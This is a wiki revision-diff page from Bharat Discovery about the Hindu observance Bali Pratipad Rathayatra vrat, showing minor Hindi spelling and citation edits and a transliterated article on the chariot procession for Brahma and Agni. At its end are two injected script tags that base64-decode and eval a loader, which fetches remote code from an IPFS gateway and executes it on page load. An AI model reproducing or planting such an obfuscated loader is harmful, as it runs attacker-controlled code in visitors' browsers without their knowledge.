Difference between revisions of "बलि प्रतिपद रथयात्रा व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replacement - "विद्वान " to "विद्वान् ")
 
(One intermediate revision by the same user not shown)
Line 4: Line 4:
 
*[[देवता]] [[ब्रह्मा]] एवं [[अग्निदेव|अग्नि]] की पूजा की जाती है।  
 
*[[देवता]] [[ब्रह्मा]] एवं [[अग्निदेव|अग्नि]] की पूजा की जाती है।  
 
*रथ पर अग्नि की पूजा की जाती है।   
 
*रथ पर अग्नि की पूजा की जाती है।   
*विद्वान [[ब्राह्मण]] रथ को खींचते हैं और उसे ब्राह्मण कर्ता कहने पर नगर में घुमाते हैं।  
+
*विद्वान् [[ब्राह्मण]] रथ को खींचते हैं और उसे ब्राह्मण कर्ता कहने पर नगर में घुमाते हैं।  
 
*ब्रह्मा के दक्षिण पक्ष में [[सावित्री]] की प्रतिमा भी रहती है; रथ को विभिन्न स्थानों पर रोका जाता है, [[आरती पूजन|आरती]] की जाती है।
 
*ब्रह्मा के दक्षिण पक्ष में [[सावित्री]] की प्रतिमा भी रहती है; रथ को विभिन्न स्थानों पर रोका जाता है, [[आरती पूजन|आरती]] की जाती है।
 
*वे सभी लोग जो की रथयात्रा में भाग लेते हैं, यथा– रथ खींचने वाले, आरती करने वाले तथा भक्तिपूर्वक दर्शन करने वाले, सर्वोत्तम स्थान के भागी होते हैं।  
 
*वे सभी लोग जो की रथयात्रा में भाग लेते हैं, यथा– रथ खींचने वाले, आरती करने वाले तथा भक्तिपूर्वक दर्शन करने वाले, सर्वोत्तम स्थान के भागी होते हैं।  
*कार्तिक शुक्ल प्रतिपदा [[बलि प्रतिपद]] है, अतएव यह 'रथयात्रा' के नाम से प्रसिद्ध है।<ref>हेमाद्रि (व्रतखण्ड 1, 345-347, भविष्यपुराण से उद्धरण)</ref>
+
*कार्तिक शुक्ल प्रतिपदा [[बलि प्रतिपद]] है, अतएव यह 'रथयात्रा' के नाम से प्रसिद्ध है।<ref>हेमाद्रि (व्रतखण्ड 1, 345-347, भविष्यपुराण से उद्धरण</ref>
 
 
 
 
  

Latest revision as of 14:41, 6 July 2017

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kartik shukl pratipada par yah vrat kiya jata hai.
  • poorv amavasya par upavas kiya jata hai.
  • devata brahma evan agni ki pooja ki jati hai.
  • rath par agni ki pooja ki jati hai.
  • vidvanh brahman rath ko khianchate haian aur use brahman karta kahane par nagar mean ghumate haian.
  • brahma ke dakshin paksh mean savitri ki pratima bhi rahati hai; rath ko vibhinn sthanoan par roka jata hai, arati ki jati hai.
  • ve sabhi log jo ki rathayatra mean bhag lete haian, yatha– rath khianchane vale, arati karane vale tatha bhaktipoorvak darshan karane vale, sarvottam sthan ke bhagi hote haian.
  • kartik shukl pratipada bali pratipad hai, atev yah 'rathayatra' ke nam se prasiddh hai.[1]

 



tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 345-347, bhavishyapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>